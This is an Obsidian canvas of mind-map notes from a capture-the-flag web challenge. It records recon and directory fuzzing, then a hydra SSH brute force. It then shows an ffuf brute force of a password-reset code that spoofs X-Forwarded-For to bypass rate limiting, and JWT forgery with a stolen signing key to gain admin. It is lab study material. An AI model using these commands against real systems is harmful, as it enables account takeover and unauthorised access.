{
	"nodes":[
		{"id":"6f00d11098671938","type":"group","x":-2316,"y":4880,"width":4720,"height":2960,"color":"#a70c9a","label":"Initial Access Attempt: Password Reset Page"},
		{"id":"b8ca2e64ae730179","type":"group","x":3040,"y":5680,"width":4480,"height":2560,"color":"#ea9580","label":"Remote Code Execution"},
		{"id":"d551fe3da14d112b","type":"group","x":-780,"y":2400,"width":3040,"height":1780,"color":"1","label":"Initial Recon"},
		{"id":"f44ec0042ee02d8b","type":"group","x":2600,"y":2400,"width":2440,"height":2000,"color":"2","label":"Enumeration"},
		{"id":"3253b40f82a7a5d5","type":"group","x":740,"y":580,"width":2240,"height":1600,"color":"5","label":"Known Info"},
		{"id":"adc6b341d1a480b1","type":"group","x":2660,"y":2500,"width":1740,"height":1760,"label":"Fuzzing for Additional Directories"},
		{"id":"41a69d75a18ad4bd","type":"group","x":-36,"y":6360,"width":2220,"height":1240,"label":"Automate IP & Timer Bypass (ffuf)"},
		{"id":"fa469d667f7d3746","type":"group","x":-36,"y":5000,"width":2260,"height":1153,"label":"Bypassing Rate Limiting"},
		{"id":"925d1125ead07f62","type":"group","x":-2196,"y":5000,"width":1960,"height":1200,"label":"Dissect HTTP Requests (Burp Suite)"},
		{"id":"4ea1bef9799085b8","type":"group","x":1180,"y":2500,"width":960,"height":1540,"label":"Website Walk"},
		{"id":"2d9bc8b8c79101b2","type":"group","x":2580,"y":4560,"width":1460,"height":880,"color":"#0400f5","label":"Initial Access Attempt: Brute Force SSH"},
		{"id":"df6b6c338b0380f0","type":"group","x":140,"y":2500,"width":980,"height":1120,"label":"Gobuster"},
		{"id":"233833e99149b2b7","type":"group","x":-740,"y":2500,"width":820,"height":1120,"label":"Nmap"},
		{"id":"095beb846330a748","type":"group","x":-720,"y":3200,"width":764,"height":380,"label":"Notes"},
		{"id":"e86b54e2b1682141","type":"group","x":1260,"y":3480,"width":640,"height":440,"label":"Source Code"},
		{"id":"da0a6a7f5ffe29f7","type":"group","x":2360,"y":900,"width":440,"height":600,"label":"Website Recon"},
		{"id":"af438b3840521768","type":"group","x":1320,"y":60,"width":400,"height":400,"label":"Room IP Address"},
		{"id":"1b30853914c20924","type":"group","x":1842,"y":160,"width":560,"height":200,"color":"5","label":"Questions to Answer"},
		{"id":"ac58158fc5bb6c2c","type":"text","text":"**Walk Website**\n- [ ] Source Code\n- [ ] Robots.txt\n- [ ] Sitemap.xml\n- [ ] URL Structure\n- [ ] Burp Walk","x":2420,"y":920,"width":300,"height":140},
		{"id":"3000ca8ce97b4e24","type":"text","text":"Non-Standard Port?","x":2698,"y":746,"width":250,"height":60},
		{"id":"99b623a29ace57b6","type":"text","text":"Cookie Replay?","x":1360,"y":760,"width":205,"height":60},
		{"id":"8d2036d78e13934c","type":"text","text":"Broken Access Control?","x":1360,"y":840,"width":250,"height":60},
		{"id":"5a0088ce2580d623","type":"text","text":"Hydra","x":1700,"y":685,"width":250,"height":60},
		{"id":"1dbb6b762f2046cb","type":"text","text":"Standard Port?\n - [ ] 80\n- [ ] 443","x":2180,"y":730,"width":260,"height":110},
		{"id":"4598bed412c76c7e","type":"text","text":"Burp Suite","x":1700,"y":760,"width":250,"height":60},
		{"id":"2d5aa2c4f83b6453","type":"text","text":"Fuzzing","x":1700,"y":600,"width":250,"height":60},
		{"id":"a7f240e57b489131","type":"text","text":"Brute Force?","x":1360,"y":680,"width":205,"height":60},
		{"id":"2ac1be2e8935ad79","type":"text","text":"*Website*","x":2440,"y":600,"width":250,"height":60},
		{"id":"934f01ada207a81c","type":"text","text":"Default Passwords?","x":1360,"y":600,"width":205,"height":60},
		{"id":"ebcb10f2a430c81e","type":"text","text":"*\"Bypass Authentication Mechanisms\"*","x":895,"y":600,"width":340,"height":60},
		{"id":"fb1bd31ccd6930e0","type":"text","text":"What is the flag value after logging in to the dashboard?","x":1862,"y":180,"width":500,"height":60},
		{"id":"65f2d3715cb57355","type":"file","file":"Web Hacking/Authentication Bypass/Username Enumeration.md","x":905,"y":900,"width":330,"height":90},
		{"id":"65607786f31e2e45","type":"text","text":"What is the content of the file /home/ubuntu/flag.tx?","x":1862,"y":240,"width":500,"height":50},
		{"id":"920f6a59c3ecc298","type":"file","file":"example case/media/Pasted image 20241221141857.png","x":1328,"y":-240,"width":750,"height":200},
		{"id":"c3b450a198dda55c","type":"text","text":"10.10.84.129","x":1356,"y":109,"width":250,"height":60},
		{"id":"536e5145da5895c5","type":"file","file":"example case/media/Pasted image 20241223202910.png","x":3100,"y":6260,"width":400,"height":285},
		{"id":"91b8b936ce5d904c","type":"link","url":"https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass","x":4,"y":5176,"width":720,"height":624},
		{"id":"60ffb820981f0a1a","type":"text","text":"**Append \"X-Forwarde-For:\" Header for Loopback Address to reset Rate Limit**","x":744,"y":5360,"width":280,"height":100},
		{"id":"c6ebc05b8687b864","type":"text","text":"**SSH does not support password authentication**","x":2800,"y":4780,"width":440,"height":60},
		{"id":"81af8def97c62096","type":"file","file":"example case/media/Pasted image 20241222120046.png","x":2700,"y":5160,"width":1200,"height":187},
		{"id":"969a167ad9ca3a21","type":"file","file":"example case/media/Pasted image 20241222115847.png","x":2700,"y":4960,"width":1201,"height":140},
		{"id":"0c8876725e4ea645","type":"file","file":"example case/media/Pasted image 20241223200416.png","x":3050,"y":5783,"width":823,"height":260},
		{"id":"0c2395fa99d49bd9","type":"text","text":"**Successful login leads to dashboard instance with command prompt**","x":3050,"y":5694,"width":610,"height":60},
		{"id":"93186a93e0a1f3e5","type":"text","text":"**Use Code to Automate Randomizing \" X-Forwarded-For\" IP Address from 127.0.0.1 thru 127.255.255.255 AND beat timer!**","x":4,"y":6400,"width":1040,"height":50},
		{"id":"3f16d9c8156c2b0a","type":"file","file":"example case/media/22.12.2024_13.56.41_REC.mp4","x":1044,"y":5222,"width":1140,"height":532},
		{"id":"4d5b541757a2089f","type":"text","text":"*Need to automatically reset IP Address AND Timer in order to force reset*","x":1294,"y":5880,"width":640,"height":60,"color":"3"},
		{"id":"675d56f1a9ca92ee","type":"file","file":"example case/media/Pasted image 20241223203201.png","x":3780,"y":6260,"width":399,"height":276},
		{"id":"38a32bde442234ad","type":"text","text":"**Dashboard has a 20 second session timeout**","x":3337,"y":6100,"width":250,"height":60},
		{"id":"7d6c890dde8f7646","type":"text","text":"**Use for-loop to generate list of random IPs to beat rate limit**","x":700,"y":6560,"width":344,"height":60},
		{"id":"bf4860398b2180bd","type":"file","file":"example case/media/Pasted image 20241223194751.png","x":1600,"y":6472,"width":534,"height":237},
		{"id":"1732868e56c63d00","type":"text","text":"**FLAG 1**","x":1960,"y":6600,"width":100,"height":60,"color":"2"},
		{"id":"681df3026fac48b4","type":"text","text":"```bash\nprintf \"%04d\\n\" {0..9999} > four_digit.txt\n```","x":24,"y":6620,"width":500,"height":80},
		{"id":"da602ecc28498672","type":"text","text":"**Need to Bypass Rate Limit Counter**","x":4,"y":5040,"width":340,"height":60},
		{"id":"edd7bd6441acd4c2","type":"text","text":"*Revist if keys located*","x":3517,"y":4801,"width":250,"height":60,"color":"3"},
		{"id":"644f255543c011bc","type":"text","text":"```bash\nhydra -l tester -P ~/Tools/wordlists/rockyou.txt 10.10.216.29 ssh -s 22 -t 4 -V\n```","x":2600,"y":4680,"width":840,"height":50},
		{"id":"09f59f9cfafdd16a","type":"text","text":"**Attempt to use username \"tester\" with wordlist to brute force SSH **","x":2600,"y":4600,"width":700,"height":60},
		{"id":"76cb5b29aa86a695","type":"file","file":"example case/media/Pasted image 20241221214852.png","x":2711,"y":4040,"width":968,"height":100},
		{"id":"ef07c073b56daff4","type":"text","text":"**Discovered Email** : tester@hammer.thm","x":2695,"y":4160,"width":445,"height":60},
		{"id":"77c57dccdd2d36ad","type":"text","text":"**Additional Directories** : /restricted, /admin","x":3195,"y":4160,"width":405,"height":60},
		{"id":"c038987650fa4b40","type":"text","text":"**180 seconds to enter 4-digit code**","x":-716,"y":5657,"width":320,"height":60,"color":"4"},
		{"id":"b44ae3c4966fb995","type":"text","text":"**Limit to 1000 IP Addresses for speed**","x":742,"y":6800,"width":250,"height":60},
		{"id":"4884d93859bfc584","type":"text","text":"**Rate Limiting Enforced!**","x":-716,"y":5316,"width":250,"height":60,"color":"4"},
		{"id":"745e38530590aeec","type":"file","file":"example case/media/Pasted image 20241223204216.png","x":3300,"y":6780,"width":640,"height":324},
		{"id":"c32b5a58241d5c85","type":"text","text":"**Packet also contains an Access Token!**","x":3420,"y":6720,"width":440,"height":60,"color":"3"},
		{"id":"8947fd26a0c154e6","type":"text","text":"**Error Logs Contain Valid Email, 2 Additional Directories**","x":2773,"y":3900,"width":275,"height":100,"color":"3"},
		{"id":"62487429290b8974","type":"text","text":"**Use both generated lists in ffuf command**","x":399,"y":7120,"width":250,"height":60},
		{"id":"6b1a904fe34bcbac","type":"file","file":"example case/media/Pasted image 20241222125726.png","x":-1256,"y":5550,"width":400,"height":273},
		{"id":"7dfb03fe19c47319","type":"file","file":"example case/media/Pasted image 20241222132714.png","x":-1256,"y":5880,"width":400,"height":273},
		{"id":"ac59403b03e39088","type":"text","text":"```bash\nhead -n 1000 fake_ip.txt > fake_ip_cut.txt\n```","x":590,"y":6860,"width":555,"height":103},
		{"id":"38d2cb789495daba","type":"file","file":"example case/media/Pasted image 20241223194518.png","x":1280,"y":7083,"width":400,"height":314},
		{"id":"64fec68172a2ea3c","type":"text","text":"**Captured Correct 4-digit Code (200 Status)**","x":960,"y":7210,"width":250,"height":60},
		{"id":"62f836a82f22b37a","type":"text","text":"**Generate List of all possible 4-digit numbers**","x":80,"y":6560,"width":340,"height":60},
		{"id":"6abf7cab1bb412a5","type":"link","url":"https://jwt.io/#debugger-io","x":4480,"y":5913,"width":1160,"height":925},
		{"id":"c30eb6fe20c0dbdc","type":"text","text":"```bash\nfor X in {0..255}; do for Y in {0..255}; do echo \"192.168.$X.$Y\"; done; done > fake_ip.txt\n```","x":660,"y":6620,"width":414,"height":140},
		{"id":"ec12f6194c2acebc","type":"text","text":"```bash\nffuf -w four_digit.txt:W1 -w fake_ip_cut.txt:W2 -u \"http://10.10.18.108:1337/reset_password.php\" -X \"POST\" -d \"recovery_code=W1&s=80\" -b \"PHPSESSID=<SESSIONID>\" -H \"X-Forwarded-For: W2\" -H \"Content-Type: application/x-www-form-urlencoded\" -fr \"Invalid\" -mode pitchfork -fw 1 -rate 100 -o output.txt\n```","x":144,"y":7180,"width":760,"height":120},
		{"id":"ac98bd67d5bb813a","type":"file","file":"example case/media/Pasted image 20241222125242.png","x":-1316,"y":5220,"width":520,"height":251},
		{"id":"a07538323cbcf435","type":"text","text":"**images**","x":3540,"y":3378,"width":103,"height":60},
		{"id":"04d10f4f2880eb6e","type":"text","text":"\"hxxp://10.10.84.129:1337/hmr_images/hammer.webp\"","x":3492,"y":3700,"width":302,"height":80},
		{"id":"ff76dad4b08fac4c","type":"text","text":"One image, no suspicious system calls or source code","x":3518,"y":3540,"width":250,"height":120},
		{"id":"800fccf062afee9f","type":"text","text":"**Need 256 bit secret to code sign token**","x":4935,"y":7056,"width":250,"height":60,"color":"3"},
		{"id":"89644ca0965713e2","type":"text","text":"*Location & Directory Structure for Uploads?*","x":4060,"y":3438,"width":250,"height":60},
		{"id":"c5a2d5416eaa15a5","type":"text","text":"**js**","x":3180,"y":3378,"width":95,"height":60},
		{"id":"4547b29bf43391c9","type":"text","text":"**4 Directories Discovered**","x":3103,"y":3220,"width":250,"height":60},
		{"id":"eb7697dcb6d04ca9","type":"text","text":"**Running ls inside Burp shows key file**","x":4935,"y":7240,"width":250,"height":60},
		{"id":"5dc589b4dec4175b","type":"file","file":"example case/media/Pasted image 20241224113054.png","x":4657,"y":7380,"width":805,"height":324},
		{"id":"771c97f08620c5ee","type":"text","text":"*Can we navigate to directory and download file?*","x":5600,"y":7512,"width":280,"height":92},
		{"id":"4cf1b2bb09998d62","type":"text","text":"SSH (22)","x":-680,"y":3310,"width":250,"height":60},
		{"id":"e3fb867d12751b34","type":"text","text":"**css**","x":3380,"y":3378,"width":100,"height":60},
		{"id":"93b5504b02f5ad3d","type":"text","text":"Used to build website, not much value here","x":3210,"y":3540,"width":250,"height":61},
		{"id":"55ef40be6e9902e1","type":"text","text":"**Directory Contains Error Logs for Logins**","x":2785,"y":3498,"width":250,"height":60,"color":"3"},
		{"id":"5e6987c4e6946794","type":"file","file":"example case/media/Pasted image 20241221214350.png","x":2710,"y":3640,"width":399,"height":174},
		{"id":"771c97510f37686a","type":"file","file":"example case/media/Pasted image 20241221211901.png","x":2700,"y":2715,"width":1020,"height":477},
		{"id":"de3991696e70d512","type":"text","text":"**Replacing with new token allows us to cat the file as admin**","x":5840,"y":6240,"width":290,"height":100,"color":"3"},
		{"id":"188537615458b849","type":"file","file":"example case/media/Pasted image 20241224113346.png","x":6080,"y":7481,"width":754,"height":123},
		{"id":"e2dc34dd3966a487","type":"file","file":"example case/media/Pasted image 20241222124907.png","x":-2176,"y":5220,"width":723,"height":240},
		{"id":"d650a85bf97e95d0","type":"text","text":"**Capture Request/Response for Test Login**","x":-2051,"y":5020,"width":400,"height":60},
		{"id":"37ed94c8f8615d2d","type":"text","text":"1337 (HTTP)","x":-265,"y":3310,"width":250,"height":60},
		{"id":"accd153586388972","type":"text","text":"Non-Standard Port\nHTTP = Unencrypted Packets","x":-265,"y":3410,"width":250,"height":130},
		{"id":"c2d39bd0e9b3c043","type":"text","text":"Brute Force?\nPasswords and/or Keys?","x":-680,"y":3430,"width":250,"height":130},
		{"id":"6984b2a3467c50eb","type":"text","text":"**Both Directories Appear to be Lab substructure**","x":495,"y":3310,"width":250,"height":60},
		{"id":"d0891d24760e1d2f","type":"file","file":"example case/media/Pasted image 20241221202808.png","x":1280,"y":3580,"width":610,"height":160},
		{"id":"221017e5aef7bce2","type":"text","text":"**Dev Note in Source Code Notes Directory Structure**","x":1280,"y":3500,"width":460,"height":60},
		{"id":"866bdfe39d3c9bd8","type":"text","text":"**LOOK FOR VALID EMAIL!**","x":1335,"y":3310,"width":250,"height":60,"color":"4"},
		{"id":"d624f3fdc2b828de","type":"text","text":"**Utilizes POST method**","x":-2176,"y":5520,"width":250,"height":60},
		{"id":"899f6980deef0234","type":"file","file":"example case/media/Pasted image 20241224115201.png","x":6280,"y":6040,"width":1041,"height":400},
		{"id":"53fe7558654767ae","type":"file","file":"example case/media/Pasted image 20241224113930.png","x":6257,"y":7200,"width":400,"height":51},
		{"id":"bb0da5aad2bf6f54","type":"text","text":"**Requires Valid Email**","x":1540,"y":3164,"width":250,"height":60},
		{"id":"f8d8f4c5fddecb8e","type":"text","text":"**Forgotten Password Button**","x":1540,"y":3040,"width":250,"height":60},
		{"id":"d1df9bb87ae12e17","type":"file","file":"example case/media/Pasted image 20241221154516.png","x":160,"y":2733,"width":920,"height":431},
		{"id":"1bd10178f36e1db7","type":"text","text":"Initial Website displays Login Page\n\n![[Pasted image 20241221155242.png]]","x":1220,"y":2540,"width":480,"height":409},
		{"id":"507e744cdd6198a6","type":"text","text":"Open Ports","x":-470,"y":3226,"width":250,"height":60},
		{"id":"f5a2f6917cec84be","type":"file","file":"example case/media/Pasted image 20241221152228.png","x":-720,"y":2700,"width":764,"height":440},
		{"id":"4f4901d2acaf30a2","type":"text","text":"**Requesting Email for Login**","x":1210,"y":3040,"width":250,"height":60},
		{"id":"cbef0bf3cf31b3f3","type":"text","text":"Consistent Error Message across Tests\n- \"Invalid Email or Password\"","x":1810,"y":2715,"width":250,"height":145},
		{"id":"e812c1646dae6c84","type":"text","text":"```bash\ngobuster dir -u http://10.10.209.228:1337/ -w /root/Tools/wordlists/dirbuster/directory-list-1.0.txt\n```","x":160,"y":2600,"width":940,"height":100},
		{"id":"a7205ad5c414f50d","type":"text","text":"**Must Append Port Number (1337) since Non-Standard HTTP Port**","x":160,"y":2520,"width":660,"height":60},
		{"id":"155203e4437e0966","type":"text","text":"```bash\nnmap -sS -sC -sV -O -p- 10.10.209.228\n```","x":-720,"y":2520,"width":580,"height":140},
		{"id":"77b38fff5e938516","type":"text","text":"**Error Testing**","x":1810,"y":2601,"width":250,"height":60},
		{"id":"0d69c5b3d3b01ee5","type":"text","text":"**logs**","x":2860,"y":3378,"width":100,"height":60},
		{"id":"728992c7c9607eca","type":"text","text":"```bash\nffuf -u 'http://10.10.84.129:1337/hmr_FUZZ' -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt\n```","x":2700,"y":2510,"width":1080,"height":130},
		{"id":"0f8a0672fda3cf6d","type":"text","text":"**FLAG 2**","x":7040,"y":5980,"width":250,"height":60,"color":"#51fd08"},
		{"id":"5e3bcdc77c8a8cbd","type":"link","url":"https://www.revshells.com/","x":1655,"y":1740,"width":400,"height":400},
		{"id":"3a469517fa87d41b","type":"link","url":"https://book.hacktricks.xyz/","x":953,"y":1740,"width":400,"height":400},
		{"id":"fb11cc9a76d384ed","type":"file","file":"Web Hacking/Content Discovery/GoBuster.md","x":2370,"y":1080,"width":400,"height":400},
		{"id":"594c7b7303cee690","type":"text","text":"*Remote Code Execution*","x":1320,"y":1580,"width":335,"height":60},
		{"id":"e5f0fdbd26a16964","type":"link","url":"https://owasp.org/Top10/A01_2021-Broken_Access_Control/","x":1285,"y":1020,"width":400,"height":400}
	],
	"edges":[
		{"id":"9345c0324fe45aba","fromNode":"ebcb10f2a430c81e","fromSide":"bottom","toNode":"65f2d3715cb57355","toSide":"top"},
		{"id":"7d049bf5b29c5e80","fromNode":"ebcb10f2a430c81e","fromSide":"right","toNode":"934f01ada207a81c","toSide":"left"},
		{"id":"1f7a3da031e14a4d","fromNode":"ebcb10f2a430c81e","fromSide":"right","toNode":"a7f240e57b489131","toSide":"left"},
		{"id":"231d1c9986c4bb0c","fromNode":"ebcb10f2a430c81e","fromSide":"right","toNode":"99b623a29ace57b6","toSide":"left"},
		{"id":"b02e9834a2e982e0","fromNode":"ebcb10f2a430c81e","fromSide":"right","toNode":"8d2036d78e13934c","toSide":"left"},
		{"id":"4bcf5b1d81c86114","fromNode":"a7f240e57b489131","fromSide":"right","toNode":"2d5aa2c4f83b6453","toSide":"left"},
		{"id":"0e6ef231dba82800","fromNode":"a7f240e57b489131","fromSide":"right","toNode":"5a0088ce2580d623","toSide":"left"},
		{"id":"22963afa94cb1ede","fromNode":"a7f240e57b489131","fromSide":"right","toNode":"4598bed412c76c7e","toSide":"left"},
		{"id":"fbb055e564847880","fromNode":"8d2036d78e13934c","fromSide":"bottom","toNode":"e5f0fdbd26a16964","toSide":"top"},
		{"id":"ed6492cd0ad82dbf","fromNode":"2ac1be2e8935ad79","fromSide":"left","toNode":"1dbb6b762f2046cb","toSide":"top"},
		{"id":"172cd7f5b5735e02","fromNode":"2ac1be2e8935ad79","fromSide":"right","toNode":"3000ca8ce97b4e24","toSide":"top"},
		{"id":"87521bae82551d88","fromNode":"2ac1be2e8935ad79","fromSide":"bottom","toNode":"da0a6a7f5ffe29f7","toSide":"top"},
		{"id":"74b4d9b2c60c7353","fromNode":"594c7b7303cee690","fromSide":"left","toNode":"3a469517fa87d41b","toSide":"top"},
		{"id":"7e07f75d042e24c5","fromNode":"594c7b7303cee690","fromSide":"right","toNode":"5e3bcdc77c8a8cbd","toSide":"top"},
		{"id":"38fd728d3aa8d54d","fromNode":"507e744cdd6198a6","fromSide":"left","toNode":"4cf1b2bb09998d62","toSide":"top"},
		{"id":"223ba64a73cfb553","fromNode":"507e744cdd6198a6","fromSide":"right","toNode":"37ed94c8f8615d2d","toSide":"top"},
		{"id":"618f64d59b959fe6","fromNode":"4cf1b2bb09998d62","fromSide":"bottom","toNode":"c2d39bd0e9b3c043","toSide":"top"},
		{"id":"d258115bfae07a04","fromNode":"37ed94c8f8615d2d","fromSide":"bottom","toNode":"accd153586388972","toSide":"top"},
		{"id":"40bb72887754d18f","fromNode":"d1df9bb87ae12e17","fromSide":"bottom","toNode":"6984b2a3467c50eb","toSide":"top"},
		{"id":"3fdca7067551263e","fromNode":"1bd10178f36e1db7","fromSide":"bottom","toNode":"4f4901d2acaf30a2","toSide":"top"},
		{"id":"348bc4dab930a3cc","fromNode":"1bd10178f36e1db7","fromSide":"bottom","toNode":"f8d8f4c5fddecb8e","toSide":"top"},
		{"id":"ea216cb43aa6aa67","fromNode":"1bd10178f36e1db7","fromSide":"right","toNode":"77b38fff5e938516","toSide":"left"},
		{"id":"d50ac6ab0e38a22b","fromNode":"77b38fff5e938516","fromSide":"bottom","toNode":"cbef0bf3cf31b3f3","toSide":"top"},
		{"id":"7a6f13fe0ba3b94b","fromNode":"f8d8f4c5fddecb8e","fromSide":"bottom","toNode":"bb0da5aad2bf6f54","toSide":"top"},
		{"id":"fde6a7258c1e389b","fromNode":"4f4901d2acaf30a2","fromSide":"bottom","toNode":"866bdfe39d3c9bd8","toSide":"top"},
		{"id":"4dc1cf0bdcc3fccf","fromNode":"bb0da5aad2bf6f54","fromSide":"bottom","toNode":"866bdfe39d3c9bd8","toSide":"right"},
		{"id":"c69c173009d5569b","fromNode":"d0891d24760e1d2f","fromSide":"right","toNode":"f44ec0042ee02d8b","toSide":"left","label":"Use for Fuzzing"},
		{"id":"6494d8b694a2857e","fromNode":"4547b29bf43391c9","fromSide":"left","toNode":"0d69c5b3d3b01ee5","toSide":"top"},
		{"id":"837c44baf9127394","fromNode":"4547b29bf43391c9","fromSide":"bottom","toNode":"c5a2d5416eaa15a5","toSide":"top"},
		{"id":"e24dede7247c874f","fromNode":"4547b29bf43391c9","fromSide":"right","toNode":"e3fb867d12751b34","toSide":"top"},
		{"id":"e4456d12385bd008","fromNode":"4547b29bf43391c9","fromSide":"right","toNode":"a07538323cbcf435","toSide":"top"},
		{"id":"8690bc2c49543925","fromNode":"c5a2d5416eaa15a5","fromSide":"bottom","toNode":"93b5504b02f5ad3d","toSide":"top"},
		{"id":"e2496410e3439f38","fromNode":"e3fb867d12751b34","fromSide":"bottom","toNode":"93b5504b02f5ad3d","toSide":"top"},
		{"id":"f5a3bad343b0afbc","fromNode":"a07538323cbcf435","fromSide":"bottom","toNode":"ff76dad4b08fac4c","toSide":"top"},
		{"id":"d93cd2809f1a4033","fromNode":"ff76dad4b08fac4c","fromSide":"bottom","toNode":"04d10f4f2880eb6e","toSide":"top"},
		{"id":"60133af072c24842","fromNode":"89644ca0965713e2","fromSide":"bottom","toNode":"04d10f4f2880eb6e","toSide":"right","color":"6","label":"Possible RFI for RevShell"},
		{"id":"44dffed36864607b","fromNode":"0d69c5b3d3b01ee5","fromSide":"bottom","toNode":"55ef40be6e9902e1","toSide":"top"},
		{"id":"507b494f6fddbfd8","fromNode":"55ef40be6e9902e1","fromSide":"bottom","toNode":"5e6987c4e6946794","toSide":"top"},
		{"id":"f6e6b2a1ccc4523d","fromNode":"5e6987c4e6946794","fromSide":"bottom","toNode":"8947fd26a0c154e6","toSide":"top"},
		{"id":"cd41b97ffba16e00","fromNode":"8947fd26a0c154e6","fromSide":"right","toNode":"76cb5b29aa86a695","toSide":"top"},
		{"id":"11c41c238003e37a","fromNode":"644f255543c011bc","fromSide":"bottom","toNode":"c6ebc05b8687b864","toSide":"top"},
		{"id":"f88146d6c1dfd792","fromNode":"c6ebc05b8687b864","fromSide":"bottom","toNode":"969a167ad9ca3a21","toSide":"top"},
		{"id":"a5963a6827e34430","fromNode":"edd7bd6441acd4c2","fromSide":"left","toNode":"c6ebc05b8687b864","toSide":"right"},
		{"id":"cbee45a094b97d80","fromNode":"ef07c073b56daff4","fromSide":"left","toNode":"2d9bc8b8c79101b2","toSide":"left"},
		{"id":"3362e55ff7af1d14","fromNode":"ef07c073b56daff4","fromSide":"left","toNode":"6f00d11098671938","toSide":"top"},
		{"id":"7bea7b065968beae","fromNode":"d650a85bf97e95d0","fromSide":"bottom","toNode":"e2dc34dd3966a487","toSide":"top","label":"Request"},
		{"id":"51acea2dc46046bc","fromNode":"e2dc34dd3966a487","fromSide":"bottom","toNode":"d624f3fdc2b828de","toSide":"right"},
		{"id":"42c9e881c2672b36","fromNode":"d650a85bf97e95d0","fromSide":"right","toNode":"ac98bd67d5bb813a","toSide":"top","label":"Response"},
		{"id":"b26f5907f2da1336","fromNode":"ac98bd67d5bb813a","fromSide":"right","toNode":"4884d93859bfc584","toSide":"left"},
		{"id":"3dbe7cc25106904a","fromNode":"ac98bd67d5bb813a","fromSide":"bottom","toNode":"6b1a904fe34bcbac","toSide":"top"},
		{"id":"8b6ffc67ae36951a","fromNode":"6b1a904fe34bcbac","fromSide":"right","toNode":"c038987650fa4b40","toSide":"left"},
		{"id":"fda4d260ace17b64","fromNode":"4884d93859bfc584","fromSide":"bottom","toNode":"c038987650fa4b40","toSide":"top","fromEnd":"arrow"},
		{"id":"3646e39469043b63","fromNode":"7dfb03fe19c47319","fromSide":"right","toNode":"c038987650fa4b40","toSide":"bottom"},
		{"id":"ce9c2875285e85e5","fromNode":"4884d93859bfc584","fromSide":"right","toNode":"fa469d667f7d3746","toSide":"left"},
		{"id":"20ee3af5013ae7e2","fromNode":"91b8b936ce5d904c","fromSide":"right","toNode":"3f16d9c8156c2b0a","toSide":"left"},
		{"id":"2fd8f1139b166f93","fromNode":"3f16d9c8156c2b0a","fromSide":"bottom","toNode":"4d5b541757a2089f","toSide":"top"},
		{"id":"ec7569a71cc38bb2","fromNode":"4d5b541757a2089f","fromSide":"bottom","toNode":"41a69d75a18ad4bd","toSide":"top"},
		{"id":"2ad84131a134fa53","fromNode":"93186a93e0a1f3e5","fromSide":"bottom","toNode":"62f836a82f22b37a","toSide":"top"},
		{"id":"9173763bb99fab18","fromNode":"93186a93e0a1f3e5","fromSide":"bottom","toNode":"7d6c890dde8f7646","toSide":"top"},
		{"id":"a32bc7fd916fb592","fromNode":"c30eb6fe20c0dbdc","fromSide":"bottom","toNode":"b44ae3c4966fb995","toSide":"top"},
		{"id":"148239c5b89b1184","fromNode":"681df3026fac48b4","fromSide":"bottom","toNode":"62487429290b8974","toSide":"top"},
		{"id":"49bddea1b1b9eabb","fromNode":"ac59403b03e39088","fromSide":"bottom","toNode":"62487429290b8974","toSide":"top"},
		{"id":"1fbea862f2ca1538","fromNode":"ec12f6194c2acebc","fromSide":"right","toNode":"38d2cb789495daba","toSide":"left"},
		{"id":"58b49e60b34a934e","fromNode":"38d2cb789495daba","fromSide":"top","toNode":"bf4860398b2180bd","toSide":"left","label":"Use 4-Digit Code to Reset \nPassword"},
		{"id":"af73c14093f2f643","fromNode":"bf4860398b2180bd","fromSide":"right","toNode":"b8ca2e64ae730179","toSide":"left"},
		{"id":"fe3aa96316b2ff61","fromNode":"0c8876725e4ea645","fromSide":"bottom","toNode":"38a32bde442234ad","toSide":"top"},
		{"id":"028259d856fc03b9","fromNode":"38a32bde442234ad","fromSide":"bottom","toNode":"536e5145da5895c5","toSide":"top"},
		{"id":"077815f91695e79c","fromNode":"536e5145da5895c5","fromSide":"right","toNode":"675d56f1a9ca92ee","toSide":"left","label":"Change to \"yes\" to\npersist session"},
		{"id":"eaf538eaaa2a2010","fromNode":"536e5145da5895c5","fromSide":"bottom","toNode":"c32b5a58241d5c85","toSide":"top"},
		{"id":"4de72b579341d466","fromNode":"675d56f1a9ca92ee","fromSide":"bottom","toNode":"c32b5a58241d5c85","toSide":"top"},
		{"id":"288943e62ceea394","fromNode":"745e38530590aeec","fromSide":"right","toNode":"6abf7cab1bb412a5","toSide":"left","label":"Decode & Alter Token\nto gain Admin"},
		{"id":"8de40d24c0da406c","fromNode":"6abf7cab1bb412a5","fromSide":"bottom","toNode":"800fccf062afee9f","toSide":"top"},
		{"id":"5a520cda04182a0f","fromNode":"800fccf062afee9f","fromSide":"bottom","toNode":"eb7697dcb6d04ca9","toSide":"top"},
		{"id":"b87814ba6e836be3","fromNode":"eb7697dcb6d04ca9","fromSide":"bottom","toNode":"5dc589b4dec4175b","toSide":"top"},
		{"id":"7dde51a140c4552f","fromNode":"5dc589b4dec4175b","fromSide":"right","toNode":"188537615458b849","toSide":"left"},
		{"id":"11aa24f5a8dda501","fromNode":"188537615458b849","fromSide":"top","toNode":"53fe7558654767ae","toSide":"bottom","label":"Successful Download"},
		{"id":"efd71a0c737fd709","fromNode":"53fe7558654767ae","fromSide":"top","toNode":"6abf7cab1bb412a5","toSide":"right","label":"Use key to sign token"},
		{"id":"12468c4d34976adb","fromNode":"6abf7cab1bb412a5","fromSide":"right","toNode":"899f6980deef0234","toSide":"left"}
	]
}